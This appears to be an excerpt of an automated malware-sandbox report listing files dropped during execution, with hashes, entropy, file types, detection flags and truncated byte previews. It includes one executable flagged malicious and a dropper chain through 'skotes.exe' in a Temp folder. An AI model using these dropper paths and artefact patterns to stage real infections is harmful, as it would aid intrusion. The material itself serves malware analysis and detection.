                                                                                                                                                                                                                                                                                                                    SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 135363
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):76326
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.9961120748813075
                                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iysAGz8vBBrYunau6wp:GdS8scZNzFrMa4M+lKqeu/nr
                                                                                                                                                                                                                                                                                                                    MD5:01E352D35675990A139199DD86B38AAC
                                                                                                                                                                                                                                                                                                                    SHA1:E16163C81E5F36B3B819AA0A63BFA63D88548A91
                                                                                                                                                                                                                                                                                                                    SHA-256:148CDE42D38C62C1A1E8B8D3D4BD8830F0F8C2DC684E3C59B0A510E31011CA4A
                                                                                                                                                                                                                                                                                                                    SHA-512:75A58FFAD6E3E0546268CC863AE382B5429795D8BCED64BAE2D06BCEEB6C2E37BD656A3E335EB61B521888B76913F2D0281F8C9C081FF8637307AE5934D98C8B
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:...........m{..(.}...7.\...N.D*.w..m..q....%XfL.*I.ql..;/.....s...E...0....`..A..[o^.^Y...F_.'.*.."L...^.......Y..W..l...E0..YY...:.&.u?....J..U<.q."...p.ib:.g.*.^.q.mr.....^&.{.E.....,EAp.q.......=.=.....z^.,d.^..J.R..zI4..2b?.-D5/.^...+.G..Y..?5..k........i.,.T#........_DV....P..d2......b\..L....o....Z.}../....CU.$.-..D9`..~......=....._.2O..?....b.{...7IY.L..q....K....T..5m.d.s.4.^... ..~<..7~6OS..b...^>.......s..n....k."..G.....L...z.U...... ... .ZY...,...kU1..N...(..V.r\$..s...X.It...x.mr..W....g........9DQR....*d......;L.S.....G... .._D.{.=.zI.g.Y~...`T..p.yO..4......8$..v.J..I.%..._.d.[..du5._._...?\..8.c.....U...fy.t....q.t....T@.......:zu..\,.!.I..AN_.....FeX..h.c.i.W.......(.....Y..F...R%.\..@.. 2(e,&.76..F+...l.t.$..`...........Wi.{.U.&(.b}...}.i..,...k....!..%...&.c..D-."..SQ.......q9....)j....7.".N....AX...).d./giR....uk.....s.....^...........:...~......(hP..K.@.&..?.E0:+D|9...U.q.cu..)t{.e...X...{.....z......LL&I6.=.
                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):23380969
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.734800858158476
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:393216:mSatYjL2Vmd6mOc/eE7G99XtIqcjhA3QV:mSaijyVmdUuYt7+N
                                                                                                                                                                                                                                                                                                                    MD5:719DCF184F232C140A40A69F05AE2AE7
                                                                                                                                                                                                                                                                                                                    SHA1:AC1E40DAF79114C78CA756F2CFE5619CD2804CC2
                                                                                                                                                                                                                                                                                                                    SHA-256:5B5856719E14B1DCF6297E51E69B147263A72203E2F7BC5D938AE41F01312270
                                                                                                                                                                                                                                                                                                                    SHA-512:36EC8A14EE9F579F221662F29F08882F6F9DC59637100A99BC782CDDBDF3AA1C27925CA5FF94E7B3E52E092A789104713E781226050466841D01CC04960BF2A5
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'X.8c9.kc9.kc9.kwR.jh9.kwR.jd9.kwR.j.9.k.V#kg9.k1L.jE9.k1L.jr9.k1L.jj9.kwR.jh9.kc9.k.9.k.L.jp9.k.L.jb9.kRichc9.k................PE..d....;Fg.........."......6...T................@..........................................`..................................................[..x...............................H... 9..............................@9..8............P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data........p.......T..............@....pdata...............`..............@..@_RDATA...............~..............@..@.rsrc...............................@..@.reloc..H...........................@..B........................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1509832
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.991711602898579
                                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:VMVdgT90A+X3dr4WfIw86pG7HUtHSs9IIWF9WD5VaLHQY3go5JVFy9+jRpdcbNox:VJ8ndrvfQKG7oSgU0D5VswYXfVFyORPl
                                                                                                                                                                                                                                                                                                                    MD5:372AD9364F93A98F10BDADF9B6B7EB5E
                                                                                                                                                                                                                                                                                                                    SHA1:8B2D931FF45E5963A8202FDD95C495542F8EF4F6
                                                                                                                                                                                                                                                                                                                    SHA-256:DAC31FE4C59F02D652B0F05CED6E5F3E07E54D95FEC93AD7F1909638B448724E
                                                                                                                                                                                                                                                                                                                    SHA-512:28C39F4C1E787B55C93B80685D619E4C95E1C4E6C3A6A737A9779F059ED975BA1A1CE5C048BED79881380BFB8ECA19742407149105FDC80093E77A5D47F56E67
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR...2...2......?.....?iCCPICC Profile..H..W.XS...[.....@@J.M......B..6B. ...A..*.v...].Q..bG.,../.T.u.`W............9.3...{....<.$... _\(...d.JMc.......8.K..@......../..D.^q.k.....-.......q......~..*.DZ..Q.[L*..1.@G...x..g)q..g(.n.Mb<..V..<.4...%.3..YP.....X ....../?....t.m...b.>+.....if.j.xY.X9.EQ...H.xS..t..'..a.+5[../.3......rL..G.....6..D..=.(%[....G.....3...........!..H...)..B.W.:YT.M.X........F.x./.!S.a...<....}Yn.[..:[.U.c......).[....!.C.T......Y.........[B./...*...LiH..,.``...l.7Z...f'.)..y...\.KB1;i@GX0*r`..aP.r..3.8)A..AR.....S$y.*{.\..*..!v+(JP....T....De.xq./<V....D....L .5.L.9@......=!... ............k.(..B$.......BP........2..E....... ...{.b.x.[2x...?..`..x.`...{~...!..bd.......`b.1..B...q?......X]p..50....'...C.5B'..xQ...(.@'..Q."..\..P....}.:T..pC...A?l..zv.,G..<+...6......LF.C..d.G....*.\...e..........C............`'.s.a..0.cX........X.....+..:....x..L.8.:w;.Q...'...3A2E*...d...A...N......./...8.w..k.......c.....s......
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                    MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                    SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                    SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                    SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:.
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):138356
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.809609231921042
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
                                                                                                                                                                                                                                                                                                                    MD5:3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
                                                                                                                                                                                                                                                                                                                    SHA1:9B73F46ADFA1F4464929B408407E73D4535C6827
                                                                                                                                                                                                                                                                                                                    SHA-256:19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
                                                                                                                                                                                                                                                                                                                    SHA-512:D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........q.a.....E..i.t,..7C..7!...`l.-.......T.vH...~.....'..aH..C.oJOE..d..2..$J......I..;.(9l.(..+.N.6.@...].a.n.S.6..=.b.W.\....o...#.~J.W.1..E...2H....S.g0....../.H...y.O8...kE.,..m!..F.D.p......H..s.W ...#.L........Ij.........-..n..\..vD.d.V.....!......[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. ?Eq.M...[6^...+.].G..Y]...7..o.. U...v....P.J...@.E!...B.d..p..i".%............oo.<....~=..!t.+...`....h..LK....0....h...,.R%.....u...._..V_.q:_._..5}.uS\.....x?...~]..C-....S=L...._c.P.B....-M...62.i*.Q.....9.....+S=...../6:...W..ql/g..&j.y..{.."....|..F....|....V....w.%t.y..?..&..a..<.n....S+|..=.ra.....
                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\DocumentsGDHDHJEBGH.exe
                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1947648
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.950008158846607
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:kxjt3XoWPCffcrq4+mGRpxe+mHg7OwhW3mtu90feqNB9ULK+Ea:iVomCffCGmGRnetcTEckNqNcK+Ea
                                                                                                                                                                                                                                                                                                                    MD5:FA098B363F56394EB669A96201D3521D
                                                                                                                                                                                                                                                                                                                    SHA1:76ECC170B800C1EC06E738A7B5E36E71233F8F2A
                                                                                                                                                                                                                                                                                                                    SHA-256:40FC948CD1A58CB92A7A43D066FD250EF34AD52984EFB82950C20BD60E7CF21F
                                                                                                                                                                                                                                                                                                                    SHA-512:0C16D78AB94169F9B82DBBE5FABBA0A1B4D8DC7294BB8CD7186334CD9E324A1B09D12BC40C10E661101247F85FDAE1C1A409750D4D906B1A54EC59B9A030B66F
                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................L...........@...........................M...........@.................................W...k.......D.....................L...............................L..................................................... . ............................@....rsrc...D...........................@....idata ............................@... ..+.........................@...aqmlcjde.....02.....................@...yinsocgv......L.....................@....taggant.0....L.."..................@...................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                    MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                    SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                    SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                    SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:.
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):11185
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                                    MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                                    SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                                    SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                                    SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1420
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.409104087404164
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:YK0bl5r75riCe0qW+5Ua02EHP5IKL0jZ5JwbX/B+L0GI55SK9g0pp5M:YK0bl5r75riN0qW+5Ua02sP5IKL0jZ53
                                                                                                                                                                                                                                                                                                                    MD5:5CDE4C722E80AA78D664BD7A23BEB74D
                                                                                                                                                                                                                                                                                                                    SHA1:249765A916CC94E4893F77F0E3A0B610A9D05D76
                                                                                                                                                                                                                                                                                                                    SHA-256:A5A7B49EDD838253C6E6B500E60C5C98D9E10A6C9AD40371816431C2641A87F2
                                                                                                                                                                                                                                                                                                                    SHA-512:334F9F67712E4FEA76D89FCF2EAEF5AB9D3B2780C07B3AFAA928CC27277483EEB91FFEDCEF46411D67B7C02F7FED1CA32D587CF3831E6B38E1FB12CF5B47E872
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"logTime": "1005/074019", "correlationVector":"Jzai6BfByv5amZ45/NBe5r","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/074027", "correlationVector":"eO8FwRQNRwFtIUhPNa0yBN","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/074027", "correlationVector":"DFCC0B139A2547CAA3433B33892C7FE6","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075031", "correlationVector":"bWXPYvVSVVANvrGBV6dHxn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075032", "correlationVector":"4CD8E3A1D096444AAB77DA6A690C4356","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075123", "correlationVector":"t3DmiSvoNTibe+/mLDIMfl","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075124", "correlationVector":"B2B504519464422FA5C6E610072CF270","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075313", "correlationVector":"/q9eTq3f/ZawbQrLDVWKju","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075314", "correlationVector":"138D0C7D
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):206855
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.983996634657522
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEI5:l81Lel7E6lEMVo/S01fDpWmEgD
                                                                                                                                                                                                                                                                                                                    MD5:788DF0376CE061534448AA17288FEA95
                                                                                                                                                                                                                                                                                                                    SHA1:C3B9285574587B3D1950EE4A8D64145E93842AEB
                                                                                                                                                                                                                                                                                                                    SHA-256:B7FB1D3C27E04785757E013EC1AC4B1551D862ACD86F6888217AB82E642882A5
                                                                                                                                                                                                                                                                                                                    SHA-512:3AA9C1AA00060753422650BBFE58EEEA308DA018605A6C5287788C3E2909BE876367F83B541E1D05FE33F284741250706339010571D2E2D153A5C5A107D35001
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1753
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                                                    MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                                                    SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                                                    SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                                                    SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):9815
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                                                    MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                                                    SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                                                    SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                                                    SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):10388
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                                                    MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                                                    SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                                                    SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                                                    SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):962
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                                                    MD5:E805E9E69FD6ECDCA65136957B1FB3BE
